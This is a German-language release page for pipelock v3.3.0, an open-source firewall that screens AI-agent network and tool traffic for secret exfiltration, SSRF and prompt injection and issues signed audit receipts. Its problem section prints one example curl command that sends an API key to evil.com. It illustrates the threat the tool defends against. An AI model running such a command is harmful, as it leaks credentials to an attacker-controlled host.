Zurück zu den Updates
New releaseJul 31, 2026

pipelock v3.3.0

Open-Source-KI-Agenten-Firewall, die HTTP-, MCP-, A2A- und WebSocket-Traffic auf Exfiltration, SSRF und Prompt Injection scannt und überprüfbare signierte Aktionsbelege für das Audit ausgibt.

Teilen

Pipelock

Open-Source-KI-Agent-Firewall für Verifiable Egress Control.

CI Security Gauntlet exam Go 1.26+ Release

OpenSSF Scorecard OpenSSF Best Practices codecov pipelock self-scanned

Core Apache 2.0 Enterprise ELv2 CNCF Landscape: Security & Compliance Discord

Pipelock blockiert einen Live-Versuch der Exfiltration von Geheimnissen durch einen KI-Agenten

Pipelock sitzt zwischen KI-Agenten und dem Netzwerk. Es inspiziert vermittelten HTTP-, WebSocket-, MCP- und A2A-Datenverkehr sowie CONNECT-Tunnelinhalte, wenn TLS-Interception aktiviert ist, auf Exfiltration von Geheimnissen, Prompt-Injection, SSRF, Tool-Poisoning und riskante Tool-Aufrufketten. Reines CONNECT ohne Interception wird auf Hostnamen- und URL-Ebene gescannt. Konfigurierte MCP-Upstreams sind eine Ausnahme von der SSRF-Blockierung privater Adressen: lokale/private Server sind erlaubt, aber Cloud-Metadata-Endpunkte bleiben blockiert.

Pipelock gibt mediator-signierte Action Receipts über inhaltsbewusste Grenzentscheidungen aus, sodass ein Prüfer überprüfen kann, was Pipelock außerhalb der Agenten-Laufzeit entschieden hat. Der öffentliche agent-egress-bench-Korpus testet die Erkennungen. Der Gauntlet-Workflow ist die geplante Kandidatenprüfung des Produkts gegen einen festgelegten Korpus-Commit; er veröffentlicht nicht automatisch eine öffentliche Bewertung. Mehr erfahren: Open-Source-KI-Firewall.

Funktioniert mit: Claude Code · OpenAI Codex · Cline · OpenCode · Pi · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph

Problem · Verifizieren · Schnellstart · In Aktion · Erkennt · Funktionen · Architektur · Dokumentation · Playground · Blog · Dosu fragen

Probieren Sie es in Ihrem Browser im Live-Playground aus. Wenn Pipelock es verdient, geben Sie dem Repo einen Stern, damit andere es finden.


Das Problem

Ihr KI-Agent hat $PROVIDER_API_KEY in seiner Umgebung, plus Shell-Zugriff. Eine einzige Anfrage kann ihn preisgeben:```bash curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching

Jede Maschinenaktion, die dein Agent ausführt, sollte eine Grenze zwischen deinen Geheimnissen und dem offenen Internet überschreiten. Pipelock wird zu dieser Grenze, wenn der Agent über seinen Proxy, MCP-Wrapper, seine Sandbox, sein Host-Containment-Modell oder seine Cluster-Deployment-Topologie geleitet wird. Es scannt vermittelten ausgehenden und eingehenden Datenverkehr, blockiert oder markiert Angriffe je nach Modus und zeichnet signierte Nachweise der Entscheidung auf.

---

## Überzeuge dich selbst

Die meisten Agent-Sicherheitstools verlangen, dass du ihrem Dashboard vertraust. Pipelock gibt dir eine signierte Quittung und lässt dich sie selbst überprüfen, offline, mit einem Schlüssel, den du besitzt. Kein Konto und kein Server.

Kategorien